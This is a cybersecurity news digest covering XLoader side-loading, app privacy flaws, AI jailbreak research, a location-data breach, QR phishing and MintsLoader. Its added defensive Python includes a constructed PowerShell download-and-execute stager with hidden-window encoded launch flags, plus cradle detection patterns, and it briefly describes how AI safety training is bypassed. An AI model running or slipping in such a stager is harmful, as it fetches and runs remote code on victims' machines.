CyberSecurity updates
2025-02-22 07:50:31 Pacific

Cybercriminals Abuse Jarsigner to Deploy XLoader Malware - 1d

A new malware campaign uses DLL side-loading to deliver the XLoader malware through jarsigner.exe, a legitimate JAR-signing tool from the JDK that ships in the Eclipse Foundation's IDE package. The attackers place a malicious DLL next to the legitimate, signed executable; because the Windows loader checks the application's own directory before the system directories, the planted DLL is mapped into the process when the tool runs. Since the process image itself is trusted and signed, the activity blends in with normal use of the tool and evades signature-based detection.
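One check a detection engineer would want for this technique is to watch image-load telemetry for a DLL that a process pulls from its own directory rather than a system directory, and that carries no valid signature. The following is an added example and not code from the reported campaign, from Sysmon, or from the page's source; the record layout ("Key: value" pairs joined with "|"), the directory list and every path in the sample records are constructed.

```python
"""
Side-loading triage over Sysmon Event ID 7 (ImageLoad) records.
Added example: the log layout ("Key: value" pairs joined with "|") and every
path below are constructed, not taken from the reported campaign.
"""
import ntpath
from dataclasses import dataclass

# Directories from which a DLL load is considered expected (assumption; tune per estate).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")


@dataclass
class ImageLoad:
    image: str          # process executable, e.g. the trusted signing tool
    image_loaded: str   # DLL that the process mapped
    signed: bool        # Sysmon "Signed" field
    sig_status: str     # Sysmon "SignatureStatus" field ("Valid" when the chain checks out)


def parse_event(line: str) -> ImageLoad:
    """Parse one constructed ImageLoad record into an ImageLoad."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(":")   # first ':' ends the key, so 'C:\' stays in the value
        fields[key.strip()] = value.strip()
    return ImageLoad(
        image=fields["Image"],
        image_loaded=fields["ImageLoaded"],
        signed=fields.get("Signed", "false").lower() == "true",
        sig_status=fields.get("SignatureStatus", ""),
    )


def is_sideload_candidate(ev: ImageLoad) -> bool:
    """A DLL pulled from the process's own directory, outside the system directories,
    without a valid signature: the shape of a planted side-loaded DLL."""
    exe_dir = ntpath.dirname(ev.image).lower() + "\\"
    dll_dir = ntpath.dirname(ev.image_loaded).lower() + "\\"
    if dll_dir.startswith(SYSTEM_DIRS):
        return False
    if dll_dir != exe_dir:
        return False
    return not (ev.signed and ev.sig_status.lower() == "valid")


def find_sideload_candidates(lines) -> list[str]:
    """Return the loaded-DLL paths that match the side-loading pattern."""
    return [ev.image_loaded for ev in map(parse_event, lines) if is_sideload_candidate(ev)]


# Constructed sample records: a system DLL, an unsigned DLL dropped beside the
# signing tool in a download folder, and a vendor DLL with a valid signature.
SAMPLE_EVENTS = [
    r"Image: C:\Users\alice\Downloads\eclipse\jarsigner.exe|ImageLoaded: C:\Windows\System32\kernel32.dll|Signed: true|SignatureStatus: Valid",
    r"Image: C:\Users\alice\Downloads\eclipse\jarsigner.exe|ImageLoaded: C:\Users\alice\Downloads\eclipse\helper.dll|Signed: false|SignatureStatus: Unavailable",
    r"Image: C:\Program Files\Vendor\tool.exe|ImageLoaded: C:\Program Files\Vendor\vendor.dll|Signed: true|SignatureStatus: Valid",
]

if __name__ == "__main__":
    for dll in find_sideload_candidates(SAMPLE_EVENTS):
        print("side-load candidate:", dll)
```

The signature test is deliberately strict: a DLL that is signed, but by a different publisher than the hosting executable, would pass it, so in production the publisher of the loaded image should also be compared against the publisher of the process image.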

RedNote App Security Issues - 2d

This cluster details a report by Citizen Lab and the EFF Threat Lab on privacy weaknesses in the RedNote app. The analysis of version 8.59.5 found that the app transmits user content over unencrypted HTTP, so anyone on the network path can read it. Static analysis also showed that certain files are encrypted with keys hard-coded in the app, so anyone who extracts the key from the app package can decrypt those files. The app further transmits device metadata without encryption, leaving it open to interception and man-in-the-middle tampering.

DeepSeek's Privacy Concerns - 12d

DeepSeek, a Chinese AI chatbot, drew attention for strong benchmark results and openly released model weights. Its rapid rise also raised security concerns about how its apps handle data: researchers found that the iOS application disables App Transport Security and transmits some user and device data unencrypted to servers operated by ByteDance.

Brave Browser Introduces Custom Scriptlets for Privacy - 11d

Brave Browser is introducing 'custom scriptlets', a feature that lets advanced users inject their own JavaScript into chosen websites to block trackers, strip unwanted page elements and otherwise tailor how sites behave. Because a scriptlet runs inside the page with the page's own privileges, a careless or untrusted scriptlet can break the site or expose the very data it was meant to protect, so the feature is aimed at users who can review the code they install.

OpenAI Model Vulnerability to Jailbreaks - 12d

Recent research shows that OpenAI's models, while powerful, can be pushed past their safety restrictions in two ways: prompt-based "jailbreaks" at inference time, and fine-tuning that overrides the safety training. A model built for benign tasks can therefore be trained to produce harmful output on request. The findings expose a structural weakness in current AI safety mechanisms and raise concerns about misaligned behaviour from deployed AI systems.

Massive Location Data Breach Affects Millions - 12d

A massive data breach at location data company Gravy Analytics has exposed sensitive location data on millions of users. The data covers users of popular apps such as Candy Crush, Tinder and MyFitnessPal, among thousands of others. The incident underscores the risks of collecting and selling location data, particularly data harvested from advertising bid streams, without the knowledge of users or even of the app developers. The breach was posted on a Russian-language forum by a hacker using the alias "Nightly" and contained coordinates of devices in the US, Europe and Russia.

Microsoft Recall Exposes Sensitive Data Screenshots - 9d

Microsoft's new AI feature 'Recall' for Copilot+ PCs takes continuous screenshots of everything a user does and was found to store snapshots containing credit card and social security numbers even with its 'sensitive information' filter enabled. This has raised serious privacy and security concerns. According to Microsoft the snapshots are stored and analysed locally on the device rather than sent to Microsoft, but a local database of everything a user has seen is still a rich target for anyone who gains access to the machine. The feature prompted enquiries from the UK Information Commissioner's Office and highlights the risks of AI-powered activity capture and the importance of user privacy.

Malicious QR Codes Distributed via Email and Snail Mail - 5d

Malicious actors are distributing malicious QR codes through various channels, including email attachments and physical mail. Scanning the code leads to phishing pages or malicious applications designed to steal login credentials and other sensitive information. Because the destination is hidden inside an image until the code is decoded, these lures bypass filters that only inspect link text, and security analysts are struggling to counter them; some email security vendors have responded with overly aggressive flagging that also blocks legitimate communications.
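The practical defence is to decode the QR payload and inspect the resulting URL before anyone opens it. The following triage function is an added example, not code from the reporting above; the brand-domain list, the shortener list, the redirect-parameter names and the sample payloads are all constructed assumptions that an organisation would replace with its own.

```python
"""
Triage of a URL decoded from a QR code before anyone opens it.
Added example; the heuristics, the brand-domain list and the sample payloads
are constructed and would be tuned per organisation.
"""
import ipaddress
from urllib.parse import urlparse, parse_qs

BRAND_DOMAINS = {"example.com"}                           # assumption: domains the org really uses
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd"}   # assumption: common shorteners
REDIRECT_PARAMS = {"url", "redirect", "next", "return", "u"}


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage_qr_payload(payload: str) -> list[str]:
    """Return the reasons a decoded payload deserves a closer look (empty = nothing flagged)."""
    reasons = []
    url = urlparse(payload.strip())
    if url.scheme not in ("http", "https"):
        return [f"non-web scheme: {url.scheme or 'none'}"]
    host = (url.hostname or "").lower()
    if url.scheme == "http":
        reasons.append("cleartext http")
    if url.username is not None:
        reasons.append("userinfo before host hides the real destination")
    if _is_ip_literal(host):
        reasons.append("ip-literal host")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label (possible homoglyph)")
    if host in SHORTENERS:
        reasons.append("url shortener hides destination")
    for domain in BRAND_DOMAINS:
        brand = domain.split(".")[0]
        # the brand name appears in the host, but the host is not the brand's domain or a subdomain of it
        if brand in host and host != domain and not host.endswith("." + domain):
            reasons.append(f"lookalike of {domain}")
    for key, values in parse_qs(url.query).items():
        if key.lower() in REDIRECT_PARAMS and any(v.startswith(("http://", "https://")) for v in values):
            reasons.append(f"redirect parameter '{key}' points at another site")
    return reasons


# Constructed payloads, as a QR decoder would hand them over (192.0.2.0/24 is a documentation range).
SAMPLE_PAYLOADS = {
    "legit":     "https://login.example.com/mfa",
    "ip-http":   "http://192.0.2.10/office365/login",
    "lookalike": "https://example.com-secure.net/verify",
    "shortener": "https://bit.ly/3abcd",
    "userinfo":  "https://login.example.com@192.0.2.10/",
    "redirect":  "https://login.example.com/go?next=https://192.0.2.10/collect",
}

if __name__ == "__main__":
    for name, payload in SAMPLE_PAYLOADS.items():
        print(f"{name:10} {triage_qr_payload(payload) or 'ok'}")
```

The checks are deliberately cheap and offline; a shortener or an open redirect on a trusted host still needs the destination resolved in a sandbox before the verdict is final.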

MintsLoader Delivering StealC and BOINC - 23d

A widespread campaign is using the MintsLoader malware loader to drop secondary payloads, including the StealC information stealer and BOINC, a legitimate open-source volunteer computing client. MintsLoader is a PowerShell-based loader delivered through spam emails with malicious attachments. StealC is used to harvest credentials and other sensitive data from the victim, while the BOINC client is abused for crypto mining and other resource theft on the infected host, giving the operators more than one way to monetise each infection.
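A PowerShell-based loader launched from a mail attachment usually shows up in process-creation telemetry as a powershell.exe command line with stacked evasion switches and an encoded or downloaded payload. The following detection logic is an added example, not code from the MintsLoader reporting or from the malware itself; the indicator list, the scoring threshold, the sample command lines and the stager text that the block encodes for its own sample are constructed.

```python
"""
Detection of PowerShell loader patterns in process-creation command lines.
Added example; the indicator list, the sample command lines and the stager
text encoded below are constructed, not taken from the MintsLoader reporting.
"""
import base64
import binascii
import re

# Indicator name -> pattern, checked against the raw command line and any decoded payload.
INDICATORS = {
    "encoded-command":   r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}",
    "hidden-window":     r"-w(?:indowstyle)?\s+hidden",
    "no-profile":        r"-nop\b|-noprofile",
    "bypass-policy":     r"-ep\s+bypass|-executionpolicy\s+bypass",
    "invoke-expression": r"\biex\b|invoke-expression",
    "download-cradle":   r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b",
}
ENCODED_ARG = re.compile(INDICATORS["encoded-command"], re.IGNORECASE)


def decode_encoded_command(cmd: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; return it decoded, or '' if absent or invalid."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return ""
    b64 = m.group(0).split()[-1]
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def analyze_command_line(cmd: str) -> dict:
    """Decode any embedded payload and list the indicators present in the command line plus payload."""
    decoded = decode_encoded_command(cmd)
    haystack = cmd + "\n" + decoded
    hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, haystack, re.IGNORECASE))
    return {"decoded": decoded, "indicators": hits}


def is_suspicious(result: dict) -> bool:
    """Flag when the payload reaches out to the network, or when several evasion switches stack up."""
    if "download-cradle" in result["indicators"]:
        return True
    return len(result["indicators"]) >= 3   # threshold is an assumption; tune against local baseline


def find_suspicious(cmd_lines) -> list[int]:
    """Indexes of the command lines that trip the detection."""
    return [i for i, cmd in enumerate(cmd_lines) if is_suspicious(analyze_command_line(cmd))]


# Constructed stager, encoded the way PowerShell expects (UTF-16LE text, then base64).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
STAGER_B64 = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    f"powershell.exe -nop -w hidden -enc {STAGER_B64}",                  # loader-style launch
    r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",         # routine admin script
    r"C:\Windows\System32\cmd.exe /c dir",                               # unrelated process
]

if __name__ == "__main__":
    for i in find_suspicious(SAMPLE_COMMAND_LINES):
        r = analyze_command_line(SAMPLE_COMMAND_LINES[i])
        print(f"[{i}] {r['indicators']}\n    decoded: {r['decoded']}")
```

Decoding the -EncodedCommand argument before matching matters: the download cradle and the Invoke-Expression call in the sample never appear in the raw command line, only in the decoded UTF-16LE payload, which is exactly where a loader hides them.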